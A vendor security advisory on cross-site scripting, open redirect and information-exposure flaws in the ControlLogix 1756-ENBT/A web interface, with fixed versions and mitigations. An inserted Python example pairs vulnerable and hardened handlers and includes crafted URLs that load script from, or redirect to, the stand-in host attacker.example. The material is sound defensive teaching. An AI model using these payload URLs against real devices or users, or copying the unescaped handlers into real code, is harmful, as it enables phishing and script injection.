
PN391 | ControlLogix 1756-ENBT/A Ethernet/IP Bridge - Potential Security Vulnerabilities

Advisory ID:
PN391
Published:
February 11, 2020
Last updated:
February 11, 2020
Revision Number:
1.0
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Summary
ControlLogix 1756-ENBT/A Ethernet/IP Bridge - Potential Security Vulnerabilities

Description

Potential Security Vulnerabilities

Rockwell Automation has identified three potential security vulnerabilities in the web interface of the 1756-ENBT/A EtherNet/IP Bridge Module (the "Product"):

  • Cross-site scripting, which could allow the Product to be used in a social engineering attack. An attacker could craft a URL that appears to lead to the Product but instead causes the user's browser to execute script from a different location. A successful attack requires the attacker to deliver the crafted URL to a user with access to the Product's web interface and to convince that user to open it.

  • Web redirection, which could likewise allow the Product to be used in a social engineering attack. An attacker could craft a URL that appears to lead to the Product but actually sends the browser to a different location. As above, the attacker must deliver the crafted URL to a user with access to the Product's web interface and convince that user to open it.

  • Exposure of some of the Product's internal web page information. This is not directly a functional vulnerability, but it does disclose internal details about the module.
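The first two issues share one attack shape: a URL whose query string the Product echoes either into a page (cross-site scripting) or into a redirect (web redirection). The following is an added example and not code from this advisory or from the 1756-ENBT firmware; the handler names, the parameter names `name` and `target`, the documentation address 192.0.2.10 standing in for the module and the host attacker.example are all assumptions. It places the vulnerable reflection beside a hardened form, and the redirect check also rejects the protocol-relative and backslash variants that browsers resolve to another host.

```python
"""Reflected XSS and open redirect from a crafted URL: vulnerable handlers
beside hardened ones. Hypothetical code for illustration; not the
1756-ENBT web server. Parameter names and hosts are assumptions."""
import html
from urllib.parse import parse_qs, urlsplit

# Constructed sample URLs of the kind an attacker would send to a user.
# 192.0.2.10 is a documentation address standing in for the module;
# attacker.example is the attacker's host.
XSS_URL = ("http://192.0.2.10/index.html?name="
           "%3Cscript%20src%3D%22http%3A//attacker.example/x.js%22%3E%3C/script%3E")
REDIRECT_URL = "http://192.0.2.10/redirect?target=http://attacker.example/login"


def query_param(url, key):
    """First value of `key` in the URL's query string (percent-decoded), or ''."""
    return parse_qs(urlsplit(url).query).get(key, [""])[0]


def render_greeting_unsafe(url):
    """Vulnerable: the parameter is copied into the page unescaped, so markup
    supplied in the URL becomes markup in the response."""
    return "<p>Hello, " + query_param(url, "name") + "</p>"


def render_greeting_safe(url):
    """Hardened: escape <, >, & and quotes before the value reaches the HTML."""
    return "<p>Hello, " + html.escape(query_param(url, "name"), quote=True) + "</p>"


def redirect_unsafe(url):
    """Vulnerable: the Location header is whatever the URL asked for."""
    return {"Location": query_param(url, "target")}


def is_local_path(target):
    """Accept only an absolute path on this device.

    Rejects absolute URLs (any scheme or host), protocol-relative '//host',
    '///host' and '/\\host' (browsers resolve all of these to another host),
    and CR/LF (response header injection).
    """
    if not target.startswith("/"):
        return False
    if target[1:2] in ("/", "\\"):
        return False
    if any(c in target for c in "\r\n\\"):
        return False
    parts = urlsplit(target)
    return not parts.scheme and not parts.netloc


def redirect_safe(url, fallback="/index.html"):
    """Hardened: off-device targets are replaced by a fixed local page."""
    target = query_param(url, "target")
    return {"Location": target if is_local_path(target) else fallback}


if __name__ == "__main__":
    print(render_greeting_unsafe(XSS_URL))
    print(render_greeting_safe(XSS_URL))
    print(redirect_unsafe(REDIRECT_URL), redirect_safe(REDIRECT_URL))
```

The redirect check deliberately allows only device-local paths rather than comparing hostnames: a module reached by IP address, by DNS name and through NAT has no single "own" host to compare against, and a path-only allow-list needs no such knowledge.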

Risk Mitigation

According to Rockwell Automation, none of these issues compromises or otherwise affects the Product's web pages or other Product functions on the module itself; the impact falls on the user whose browser opens a crafted URL.

These potential security vulnerabilities are corrected in:

  • 1756-ENBT Version 4.008

  • 1756-EWEB Version 4.009

The best way to mitigate the risk associated with these issues is to employ the following in the design of network architecture:

  • Layered security.

  • Defense-in-depth methods.

Refer to http://www.ab.com/networks/architectures.html for comprehensive information about implementing validated architectures designed to deliver these measures.

Additionally, certain web browsers and browser add-ons can help mitigate the cross-site scripting issue. Internet Explorer 8 (in beta release at the time this advisory was originally written) has cross-site scripting protection built in, and the NoScript add-on for the Firefox browser can help block cross-site scripting attacks. These browser-side controls address the cross-site scripting issue only; they are not offered as mitigations for the web redirection or information exposure issues.

For more information and for assistance in assessing the security of your existing control system, including improving system-level security when using Rockwell Automation and other vendors' control products, visit the Rockwell Automation Security Solutions web site at http://www.rockwellautomation.com/solutions/security/.

REFERENCES

http://www.kb.cert.org/vuls/id/124059

http://www.kb.cert.org/vuls/id/619499

http://www.kb.cert.org/vuls/id/882619

Industry Advisory - CIP: Rockwell Automation ControlLogix 1756-ENBT/A WebServer Vulnerabilities

KCS Status

Released

Copyright ©2022 Rockwell Automation, Inc.